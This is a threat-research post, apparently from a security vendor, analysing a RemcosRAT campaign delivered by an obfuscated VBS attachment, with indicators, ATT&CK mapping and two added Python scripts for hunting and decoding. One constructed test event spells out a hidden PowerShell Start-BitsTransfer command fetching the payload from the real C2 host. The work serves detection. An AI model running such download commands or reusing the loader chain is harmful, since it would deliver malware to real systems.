[Pipeline Research] Investigating A Prepared Campaign of RemcosRAT
Pipeline, Inc. observed a recent threat campaign delivering RemcosRAT malware. The threat actor was distributing a malicious VBS file as an e-mail attachment. The infection chain is shown below:
[Figure: Infection chain we observed]
The VBS e-mail attachment was heavily obfuscated and hard to analyze. After de-obfuscating it, we found that the following function is executed by PowerShell:
This snippet of code is launched via Wscript.Shell. It downloads the second-stage payload from the C2 server using the PowerShell cmdlet Start-BitsTransfer and writes the payload to a local file named Asturi.Bel. The C2 server URL is:
hxxps[://]spiderzlame[.]shop/Memoreres[.]hhk
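The Wscript.Shell to PowerShell to Start-BitsTransfer chain described above is a useful hunting pattern on its own, independent of the specific domain. The script below is an added example written for this post, not code from the campaign or from Pipeline's tooling; it refangs the defanged IoC as published above and scans a handful of constructed process-creation records (shaped like flattened Sysmon Event ID 1 fields, invented here for the test) for a script host spawning PowerShell, a Start-BitsTransfer download from a URL, the known C2 domain, and the Asturi.Bel payload name.

```python
import re

# IoCs taken from the report, stored defanged and refanged at use time.
DEFANGED_C2_URL = "hxxps[://]spiderzlame[.]shop/Memoreres[.]hhk"
IOC_FILENAMES = {"asturi.bel"}


def refang(ioc: str) -> str:
    """Turn the report's defanged notation back into a matchable string."""
    return ioc.replace("hxxp", "http").replace("[://]", "://").replace("[.]", ".")


def host_of(url: str) -> str:
    """Return the lower-cased host part of an http(s) URL."""
    m = re.match(r"https?://([^/\s'\"]+)", url, re.I)
    return m.group(1).lower() if m else ""


IOC_DOMAINS = {host_of(refang(DEFANGED_C2_URL))}  # -> {"spiderzlame.shop"}


def extract_hosts(cmdline: str) -> set:
    """All hosts referenced by http(s) URLs inside a command line."""
    return {h.lower() for h in re.findall(r"https?://([^/\s'\"]+)", cmdline, re.I)}


def classify(event: dict) -> list:
    """Return the list of reasons an event matches the observed chain (empty if benign)."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent.endswith(("wscript.exe", "cscript.exe")) and image.endswith("powershell.exe"):
        reasons.append("script host spawned PowerShell")
    if re.search(r"start-bitstransfer", cmd, re.I) and re.search(r"https?://", cmd, re.I):
        reasons.append("Start-BitsTransfer download from URL")
    if extract_hosts(cmd) & IOC_DOMAINS:
        reasons.append("known C2 domain")
    if any(name in cmd.lower() for name in IOC_FILENAMES):
        reasons.append("known payload filename")
    return reasons


def scan(events: list) -> dict:
    """Map event index -> reasons for every event that matched at least one check."""
    hits = {}
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits[i] = reasons
    return hits


# Constructed sample events for the demonstration; not telemetry from the campaign.
SAMPLE_EVENTS = [
    {   # mirrors the chain described in the post
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -c Start-BitsTransfer -Source "
                       + refang(DEFANGED_C2_URL) + r" -Destination $env:APPDATA\Asturi.Bel",
    },
    {   # ordinary scheduled maintenance script: no match
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\backup.ps1",
    },
    {   # legitimate BITS download from an internal host: matches one check only
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -c Start-BitsTransfer -Source http://intranet.example.local/tools.zip -Destination C:\temp\tools.zip",
    },
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(why)}")
```

Only the first event trips all four checks; the third shows why the Start-BitsTransfer check alone is a weak signal and is better combined with the parent-process check.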
Surprisingly, when we visited the domain, we got this:
Even when we tried to get the Whois info for the domain, we got 'Server is busy now, please try again later.', as shown below:
This is why it looks like a well-prepared threat campaign, with obfuscation at every layer. The payload downloaded from the C2 is a very long Base64 string (more than 200k characters):
[Figure: Base64 payload downloaded from C2]
The payload is decoded with the [System.Convert]::FromBase64String() method, and the resulting byte array is converted to a string with [System.Text.Encoding]::ASCII.GetString(). De-obfuscation is still not complete at this point: some garbage text remains in the payload, so the malware uses the substring() method to extract the actual payload:
This payload begins with a function, Spnding02(), which de-obfuscates the next-stage payload. After de-obfuscating and simplifying the payload, it looks like this:
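When reproducing this decode step outside PowerShell, two .NET details matter: FromBase64String() ignores whitespace in the input, and ASCII.GetString() maps every byte above 0x7F to '?' rather than failing, which changes string offsets if you decode with a stricter codec. The script below is an added example written for this post (not the malware's code and not Pipeline's tooling) that mirrors the FromBase64String / ASCII.GetString / substring chain with those behaviours, and runs it over a constructed blob in which a placeholder stage is wrapped in junk bytes, as the post describes.

```python
import base64
from typing import Optional


def net_from_base64(b64_text: str) -> bytes:
    """Mirror [System.Convert]::FromBase64String(): whitespace is ignored, bad input raises."""
    compact = "".join(b64_text.split())
    return base64.b64decode(compact, validate=True)


def net_ascii_get_string(data: bytes) -> str:
    """Mirror [System.Text.Encoding]::ASCII.GetString(): bytes > 0x7F become '?' (0x3F)."""
    return bytes(b if b < 0x80 else 0x3F for b in data).decode("ascii")


def unwrap_stage(b64_text: str, start: int, length: Optional[int] = None) -> str:
    """Decode a Base64 blob the way the loader does and apply Substring(start[, length]).

    Range checks follow .NET, which throws instead of silently clamping like a Python slice.
    """
    text = net_ascii_get_string(net_from_base64(b64_text))
    if length is None:
        if not 0 <= start <= len(text):
            raise ValueError("Substring(start) out of range")
        return text[start:]
    if start < 0 or length < 0 or start + length > len(text):
        raise ValueError("Substring(start, length) out of range")
    return text[start:start + length]


# Constructed sample: junk prefix + placeholder stage + junk suffix. The suffix
# carries two bytes > 0x7F so the '?' mapping is visible. The stage is a harmless
# placeholder string, not the campaign's real Spnding02() code.
PREFIX = b"<<junk-prefix-7f3a>>"
INNER = b'function Spnding02 { "next-stage placeholder (constructed)" }'
SUFFIX = b"<<junk-suffix>>\xe9\xff"
# encodebytes() inserts newlines every 76 characters, like the wrapped blob an analyst pastes.
SAMPLE_BLOB = base64.encodebytes(PREFIX + INNER + SUFFIX).decode("ascii")

if __name__ == "__main__":
    print(unwrap_stage(SAMPLE_BLOB, len(PREFIX), len(INNER)))
```

The offsets passed to unwrap_stage() are the same two numbers the loader passes to substring(); with a real sample you copy them from the de-obfuscated script, and the out-of-range check tells you immediately if the blob you captured is truncated.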
The malware was also found to connect to another domain:
windowsupdatebg[.]s[.]llnwi[.]net
The malware's file name in the e-mail attachment is 'importe PDF.vbs'. The malware sleeps for some time as an evasion technique and uses the VirtualAlloc() function to reserve memory for the code it executes. Some of its command lines are shown below:
MITRE ATT&CK Mapping
T1047 - Windows Management Instrumentation
T1010 - Application Window Discovery
T1018 - Remote System Discovery
T1082 - System Information Discovery
T1083 - File and Directory Discovery
T1518.001 - Software Discovery: Security Software Discovery
T1105 - Ingress Tool Transfer
T1497 - Virtualization/Sandbox Evasion